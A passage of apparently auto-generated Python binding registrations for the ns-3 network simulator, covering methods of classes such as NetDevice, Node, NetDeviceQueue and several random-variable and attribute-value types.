'buildings'): void ns3::MobilityBuildingInfo::SetIndoor(ns3::Ptr<ns3::Building> building, uint8_t nfloor, uint8_t nroomx, uint8_t nroomy) [member function] cls.add_method('SetIndoor', 'void', [param('ns3::Ptr< ns3::Building >', 'building'), param('uint8_t', 'nfloor'), param('uint8_t', 'nroomx'), param('uint8_t', 'nroomy')]) ## mobility-building-info.h (module 'buildings'): void ns3::MobilityBuildingInfo::SetIndoor(uint8_t nfloor, uint8_t nroomx, uint8_t nroomy) [member function] cls.add_method('SetIndoor', 'void', [param('uint8_t', 'nfloor'), 
param('uint8_t', 'nroomx'), param('uint8_t', 'nroomy')]) ## mobility-building-info.h (module 'buildings'): void ns3::MobilityBuildingInfo::SetOutdoor() [member function] cls.add_method('SetOutdoor', 'void', []) return def register_Ns3NakagamiPropagationLossModel_methods(root_module, cls): ## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::NakagamiPropagationLossModel::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## propagation-loss-model.h (module 'propagation'): ns3::NakagamiPropagationLossModel::NakagamiPropagationLossModel() [constructor] cls.add_constructor([]) ## propagation-loss-model.h (module 'propagation'): double ns3::NakagamiPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, visibility='private', is_virtual=True) ## propagation-loss-model.h (module 'propagation'): int64_t ns3::NakagamiPropagationLossModel::DoAssignStreams(int64_t stream) [member function] cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], visibility='private', is_virtual=True) return def register_Ns3NetDevice_methods(root_module, cls): ## net-device.h (module 'network'): ns3::NetDevice::NetDevice() [constructor] cls.add_constructor([]) ## net-device.h (module 'network'): ns3::NetDevice::NetDevice(ns3::NetDevice const & arg0) [copy constructor] cls.add_constructor([param('ns3::NetDevice const &', 'arg0')]) ## net-device.h (module 'network'): void ns3::NetDevice::AddLinkChangeCallback(ns3::Callback<void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> callback) [member function] cls.add_method('AddLinkChangeCallback', 'void', [param('ns3::Callback< void, ns3::empty, 
ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetAddress() const [member function] cls.add_method('GetAddress', 'ns3::Address', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetBroadcast() const [member function] cls.add_method('GetBroadcast', 'ns3::Address', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): ns3::Ptr<ns3::Channel> ns3::NetDevice::GetChannel() const [member function] cls.add_method('GetChannel', 'ns3::Ptr< ns3::Channel >', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): uint32_t ns3::NetDevice::GetIfIndex() const [member function] cls.add_method('GetIfIndex', 'uint32_t', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): uint16_t ns3::NetDevice::GetMtu() const [member function] cls.add_method('GetMtu', 'uint16_t', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetMulticast(ns3::Ipv4Address multicastGroup) const [member function] cls.add_method('GetMulticast', 'ns3::Address', [param('ns3::Ipv4Address', 'multicastGroup')], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetMulticast(ns3::Ipv6Address addr) const [member function] cls.add_method('GetMulticast', 'ns3::Address', [param('ns3::Ipv6Address', 'addr')], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): ns3::Ptr<ns3::Node> ns3::NetDevice::GetNode() const [member function] cls.add_method('GetNode', 'ns3::Ptr< ns3::Node >', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): static ns3::TypeId 
ns3::NetDevice::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## net-device.h (module 'network'): bool ns3::NetDevice::IsBridge() const [member function] cls.add_method('IsBridge', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::IsBroadcast() const [member function] cls.add_method('IsBroadcast', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::IsLinkUp() const [member function] cls.add_method('IsLinkUp', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::IsMulticast() const [member function] cls.add_method('IsMulticast', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::IsPointToPoint() const [member function] cls.add_method('IsPointToPoint', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::NeedsArp() const [member function] cls.add_method('NeedsArp', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::Send(ns3::Ptr<ns3::Packet> packet, ns3::Address const & dest, uint16_t protocolNumber) [member function] cls.add_method('Send', 'bool', [param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::SendFrom(ns3::Ptr<ns3::Packet> packet, ns3::Address const & source, ns3::Address const & dest, uint16_t protocolNumber) [member function] cls.add_method('SendFrom', 'bool', [param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'source'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')], 
is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDevice::SetAddress(ns3::Address address) [member function] cls.add_method('SetAddress', 'void', [param('ns3::Address', 'address')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDevice::SetIfIndex(uint32_t const index) [member function] cls.add_method('SetIfIndex', 'void', [param('uint32_t const', 'index')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::SetMtu(uint16_t const mtu) [member function] cls.add_method('SetMtu', 'bool', [param('uint16_t const', 'mtu')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDevice::SetNode(ns3::Ptr<ns3::Node> node) [member function] cls.add_method('SetNode', 'void', [param('ns3::Ptr< ns3::Node >', 'node')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDevice::SetPromiscReceiveCallback(ns3::Callback<bool,ns3::Ptr<ns3::NetDevice>,ns3::Ptr<const ns3::Packet>,short unsigned int,const ns3::Address&,const ns3::Address&,ns3::NetDevice::PacketType,ns3::empty,ns3::empty,ns3::empty> cb) [member function] cls.add_method('SetPromiscReceiveCallback', 'void', [param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, short unsigned int, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'cb')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDevice::SetReceiveCallback(ns3::Callback<bool,ns3::Ptr<ns3::NetDevice>,ns3::Ptr<const ns3::Packet>,short unsigned int,const ns3::Address&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> cb) [member function] cls.add_method('SetReceiveCallback', 'void', [param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, short unsigned int, ns3::Address const &, ns3::empty, ns3::empty, 
ns3::empty, ns3::empty, ns3::empty >', 'cb')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::SupportsSendFrom() const [member function] cls.add_method('SupportsSendFrom', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3NetDeviceQueue_methods(root_module, cls): ## net-device.h (module 'network'): ns3::NetDeviceQueue::NetDeviceQueue(ns3::NetDeviceQueue const & arg0) [copy constructor] cls.add_constructor([param('ns3::NetDeviceQueue const &', 'arg0')]) ## net-device.h (module 'network'): ns3::NetDeviceQueue::NetDeviceQueue() [constructor] cls.add_constructor([]) ## net-device.h (module 'network'): ns3::Ptr<ns3::QueueLimits> ns3::NetDeviceQueue::GetQueueLimits() [member function] cls.add_method('GetQueueLimits', 'ns3::Ptr< ns3::QueueLimits >', []) ## net-device.h (module 'network'): bool ns3::NetDeviceQueue::IsStopped() const [member function] cls.add_method('IsStopped', 'bool', [], is_const=True) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::NotifyQueuedBytes(uint32_t bytes) [member function] cls.add_method('NotifyQueuedBytes', 'void', [param('uint32_t', 'bytes')]) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::NotifyTransmittedBytes(uint32_t bytes) [member function] cls.add_method('NotifyTransmittedBytes', 'void', [param('uint32_t', 'bytes')]) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::ResetQueueLimits() [member function] cls.add_method('ResetQueueLimits', 'void', []) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::SetQueueLimits(ns3::Ptr<ns3::QueueLimits> ql) [member function] cls.add_method('SetQueueLimits', 'void', [param('ns3::Ptr< ns3::QueueLimits >', 'ql')]) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::SetWakeCallback(ns3::Callback<void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function] 
cls.add_method('SetWakeCallback', 'void', [param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')], is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::Start() [member function] cls.add_method('Start', 'void', [], is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::Stop() [member function] cls.add_method('Stop', 'void', [], is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::Wake() [member function] cls.add_method('Wake', 'void', [], is_virtual=True) return def register_Ns3NetDeviceQueueInterface_methods(root_module, cls): ## net-device.h (module 'network'): ns3::NetDeviceQueueInterface::NetDeviceQueueInterface(ns3::NetDeviceQueueInterface const & arg0) [copy constructor] cls.add_constructor([param('ns3::NetDeviceQueueInterface const &', 'arg0')]) ## net-device.h (module 'network'): ns3::NetDeviceQueueInterface::NetDeviceQueueInterface() [constructor] cls.add_constructor([]) ## net-device.h (module 'network'): void ns3::NetDeviceQueueInterface::CreateTxQueues() [member function] cls.add_method('CreateTxQueues', 'void', []) ## net-device.h (module 'network'): uint8_t ns3::NetDeviceQueueInterface::GetNTxQueues() const [member function] cls.add_method('GetNTxQueues', 'uint8_t', [], is_const=True) ## net-device.h (module 'network'): ns3::Callback<unsigned char, ns3::Ptr<ns3::QueueItem>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ns3::NetDeviceQueueInterface::GetSelectQueueCallback() const [member function] cls.add_method('GetSelectQueueCallback', 'ns3::Callback< unsigned char, ns3::Ptr< ns3::QueueItem >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', [], is_const=True) ## net-device.h (module 'network'): ns3::Ptr<ns3::NetDeviceQueue> ns3::NetDeviceQueueInterface::GetTxQueue(uint8_t i) const [member 
function] cls.add_method('GetTxQueue', 'ns3::Ptr< ns3::NetDeviceQueue >', [param('uint8_t', 'i')], is_const=True) ## net-device.h (module 'network'): static ns3::TypeId ns3::NetDeviceQueueInterface::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## net-device.h (module 'network'): void ns3::NetDeviceQueueInterface::SetSelectQueueCallback(ns3::Callback<unsigned char, ns3::Ptr<ns3::QueueItem>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function] cls.add_method('SetSelectQueueCallback', 'void', [param('ns3::Callback< unsigned char, ns3::Ptr< ns3::QueueItem >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')]) ## net-device.h (module 'network'): void ns3::NetDeviceQueueInterface::SetTxQueuesN(uint8_t numTxQueues) [member function] cls.add_method('SetTxQueuesN', 'void', [param('uint8_t', 'numTxQueues')]) ## net-device.h (module 'network'): void ns3::NetDeviceQueueInterface::DoDispose() [member function] cls.add_method('DoDispose', 'void', [], visibility='protected', is_virtual=True) return def register_Ns3Node_methods(root_module, cls): ## node.h (module 'network'): ns3::Node::Node(ns3::Node const & arg0) [copy constructor] cls.add_constructor([param('ns3::Node const &', 'arg0')]) ## node.h (module 'network'): ns3::Node::Node() [constructor] cls.add_constructor([]) ## node.h (module 'network'): ns3::Node::Node(uint32_t systemId) [constructor] cls.add_constructor([param('uint32_t', 'systemId')]) ## node.h (module 'network'): uint32_t ns3::Node::AddApplication(ns3::Ptr<ns3::Application> application) [member function] cls.add_method('AddApplication', 'uint32_t', [param('ns3::Ptr< ns3::Application >', 'application')]) ## node.h (module 'network'): uint32_t ns3::Node::AddDevice(ns3::Ptr<ns3::NetDevice> device) [member function] cls.add_method('AddDevice', 'uint32_t', [param('ns3::Ptr< ns3::NetDevice >', 
'device')]) ## node.h (module 'network'): static bool ns3::Node::ChecksumEnabled() [member function] cls.add_method('ChecksumEnabled', 'bool', [], is_static=True) ## node.h (module 'network'): ns3::Ptr<ns3::Application> ns3::Node::GetApplication(uint32_t index) const [member function] cls.add_method('GetApplication', 'ns3::Ptr< ns3::Application >', [param('uint32_t', 'index')], is_const=True) ## node.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::Node::GetDevice(uint32_t index) const [member function] cls.add_method('GetDevice', 'ns3::Ptr< ns3::NetDevice >', [param('uint32_t', 'index')], is_const=True) ## node.h (module 'network'): uint32_t ns3::Node::GetId() const [member function] cls.add_method('GetId', 'uint32_t', [], is_const=True) ## node.h (module 'network'): ns3::Time ns3::Node::GetLocalTime() const [member function] cls.add_method('GetLocalTime', 'ns3::Time', [], is_const=True) ## node.h (module 'network'): uint32_t ns3::Node::GetNApplications() const [member function] cls.add_method('GetNApplications', 'uint32_t', [], is_const=True) ## node.h (module 'network'): uint32_t ns3::Node::GetNDevices() const [member function] cls.add_method('GetNDevices', 'uint32_t', [], is_const=True) ## node.h (module 'network'): uint32_t ns3::Node::GetSystemId() const [member function] cls.add_method('GetSystemId', 'uint32_t', [], is_const=True) ## node.h (module 'network'): static ns3::TypeId ns3::Node::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## node.h (module 'network'): void ns3::Node::RegisterDeviceAdditionListener(ns3::Callback<void,ns3::Ptr<ns3::NetDevice>,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> listener) [member function] cls.add_method('RegisterDeviceAdditionListener', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'listener')]) ## node.h (module 
'network'): void ns3::Node::RegisterProtocolHandler(ns3::Callback<void, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> handler, uint16_t protocolType, ns3::Ptr<ns3::NetDevice> device, bool promiscuous=false) [member function] cls.add_method('RegisterProtocolHandler', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'handler'), param('uint16_t', 'protocolType'), param('ns3::Ptr< ns3::NetDevice >', 'device'), param('bool', 'promiscuous', default_value='false')]) ## node.h (module 'network'): void ns3::Node::UnregisterDeviceAdditionListener(ns3::Callback<void,ns3::Ptr<ns3::NetDevice>,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> listener) [member function] cls.add_method('UnregisterDeviceAdditionListener', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'listener')]) ## node.h (module 'network'): void ns3::Node::UnregisterProtocolHandler(ns3::Callback<void, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> handler) [member function] cls.add_method('UnregisterProtocolHandler', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'handler')]) ## node.h (module 'network'): void ns3::Node::DoDispose() [member function] cls.add_method('DoDispose', 'void', [], visibility='protected', is_virtual=True) ## node.h (module 
'network'): void ns3::Node::DoInitialize() [member function] cls.add_method('DoInitialize', 'void', [], visibility='protected', is_virtual=True) return def register_Ns3NormalRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): ns3::NormalRandomVariable::INFINITE_VALUE [variable] cls.add_static_attribute('INFINITE_VALUE', 'double const', is_const=True) ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::NormalRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::NormalRandomVariable::NormalRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetMean() const [member function] cls.add_method('GetMean', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetVariance() const [member function] cls.add_method('GetVariance', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetBound() const [member function] cls.add_method('GetBound', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetValue(double mean, double variance, double bound=ns3::NormalRandomVariable::INFINITE_VALUE) [member function] cls.add_method('GetValue', 'double', [param('double', 'mean'), param('double', 'variance'), param('double', 'bound', default_value='ns3::NormalRandomVariable::INFINITE_VALUE')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::NormalRandomVariable::GetInteger(uint32_t mean, uint32_t variance, uint32_t bound) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'mean'), param('uint32_t', 'variance'), param('uint32_t', 'bound')]) ## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetValue() [member function] 
cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::NormalRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3ObjectFactoryChecker_methods(root_module, cls): ## object-factory.h (module 'core'): ns3::ObjectFactoryChecker::ObjectFactoryChecker() [constructor] cls.add_constructor([]) ## object-factory.h (module 'core'): ns3::ObjectFactoryChecker::ObjectFactoryChecker(ns3::ObjectFactoryChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::ObjectFactoryChecker const &', 'arg0')]) return def register_Ns3ObjectFactoryValue_methods(root_module, cls): ## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue() [constructor] cls.add_constructor([]) ## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue(ns3::ObjectFactoryValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::ObjectFactoryValue const &', 'arg0')]) ## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue(ns3::ObjectFactory const & value) [constructor] cls.add_constructor([param('ns3::ObjectFactory const &', 'value')]) ## object-factory.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::ObjectFactoryValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## object-factory.h (module 'core'): bool ns3::ObjectFactoryValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## object-factory.h (module 'core'): ns3::ObjectFactory ns3::ObjectFactoryValue::Get() const [member function] cls.add_method('Get', 'ns3::ObjectFactory', [], is_const=True) ## object-factory.h (module 
'core'): std::string ns3::ObjectFactoryValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## object-factory.h (module 'core'): void ns3::ObjectFactoryValue::Set(ns3::ObjectFactory const & value) [member function] cls.add_method('Set', 'void', [param('ns3::ObjectFactory const &', 'value')]) return def register_Ns3OhBuildingsPropagationLossModel_methods(root_module, cls): ## oh-buildings-propagation-loss-model.h (module 'buildings'): static ns3::TypeId ns3::OhBuildingsPropagationLossModel::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## oh-buildings-propagation-loss-model.h (module 'buildings'): ns3::OhBuildingsPropagationLossModel::OhBuildingsPropagationLossModel() [constructor] cls.add_constructor([]) ## oh-buildings-propagation-loss-model.h (module 'buildings'): double ns3::OhBuildingsPropagationLossModel::GetLoss(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('GetLoss', 'double', [param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, is_virtual=True) return def register_Ns3ParetoRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ParetoRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::ParetoRandomVariable::ParetoRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetMean() const [member function] cls.add_method('GetMean', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetShape() const [member function] 
cls.add_method('GetShape', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetBound() const [member function] cls.add_method('GetBound', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetValue(double mean, double shape, double bound) [member function] cls.add_method('GetValue', 'double', [param('double', 'mean'), param('double', 'shape'), param('double', 'bound')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ParetoRandomVariable::GetInteger(uint32_t mean, uint32_t shape, uint32_t bound) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'mean'), param('uint32_t', 'shape'), param('uint32_t', 'bound')]) ## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::ParetoRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3QueueItem_methods(root_module, cls): cls.add_output_stream_operator() ## net-device.h (module 'network'): ns3::QueueItem::QueueItem(ns3::Ptr<ns3::Packet> p) [constructor] cls.add_constructor([param('ns3::Ptr< ns3::Packet >', 'p')]) ## net-device.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::QueueItem::GetPacket() const [member function] cls.add_method('GetPacket', 'ns3::Ptr< ns3::Packet >', [], is_const=True) ## net-device.h (module 'network'): uint32_t ns3::QueueItem::GetPacketSize() const [member function] cls.add_method('GetPacketSize', 'uint32_t', [], is_const=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::QueueItem::GetUint8Value(ns3::QueueItem::Uint8Values field, uint8_t & value) const [member function] cls.add_method('GetUint8Value', 'bool', [param('ns3::QueueItem::Uint8Values', 'field'), param('uint8_t &', 'value')], 
is_const=True, is_virtual=True) ## net-device.h (module 'network'): void ns3::QueueItem::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True) return def register_Ns3TimeValue_methods(root_module, cls): ## nstime.h (module 'core'): ns3::TimeValue::TimeValue() [constructor] cls.add_constructor([]) ## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::TimeValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::TimeValue const &', 'arg0')]) ## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::Time const & value) [constructor] cls.add_constructor([param('ns3::Time const &', 'value')]) ## nstime.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TimeValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## nstime.h (module 'core'): bool ns3::TimeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## nstime.h (module 'core'): ns3::Time ns3::TimeValue::Get() const [member function] cls.add_method('Get', 'ns3::Time', [], is_const=True) ## nstime.h (module 'core'): std::string ns3::TimeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## nstime.h (module 'core'): void ns3::TimeValue::Set(ns3::Time const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Time const &', 'value')]) return def register_Ns3TypeIdChecker_methods(root_module, cls): ## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker() [constructor] cls.add_constructor([]) ## 
type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker(ns3::TypeIdChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::TypeIdChecker const &', 'arg0')]) return def register_Ns3TypeIdValue_methods(root_module, cls): ## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue() [constructor] cls.add_constructor([]) ## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeIdValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::TypeIdValue const &', 'arg0')]) ## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeId const & value) [constructor] cls.add_constructor([param('ns3::TypeId const &', 'value')]) ## type-id.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TypeIdValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## type-id.h (module 'core'): bool ns3::TypeIdValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeIdValue::Get() const [member function] cls.add_method('Get', 'ns3::TypeId', [], is_const=True) ## type-id.h (module 'core'): std::string ns3::TypeIdValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## type-id.h (module 'core'): void ns3::TypeIdValue::Set(ns3::TypeId const & value) [member function] cls.add_method('Set', 'void', [param('ns3::TypeId const &', 'value')]) return def register_Ns3Vector2DChecker_methods(root_module, cls): ## vector.h (module 'core'): ns3::Vector2DChecker::Vector2DChecker() [constructor] cls.add_constructor([]) ## vector.h 
(module 'core'): ns3::Vector2DChecker::Vector2DChecker(ns3::Vector2DChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::Vector2DChecker const &', 'arg0')]) return def register_Ns3Vector2DValue_methods(root_module, cls): ## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue() [constructor] cls.add_constructor([]) ## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue(ns3::Vector2DValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::Vector2DValue const &', 'arg0')]) ## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue(ns3::Vector2D const & value) [constructor] cls.add_constructor([param('ns3::Vector2D const &', 'value')]) ## vector.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::Vector2DValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## vector.h (module 'core'): bool ns3::Vector2DValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), 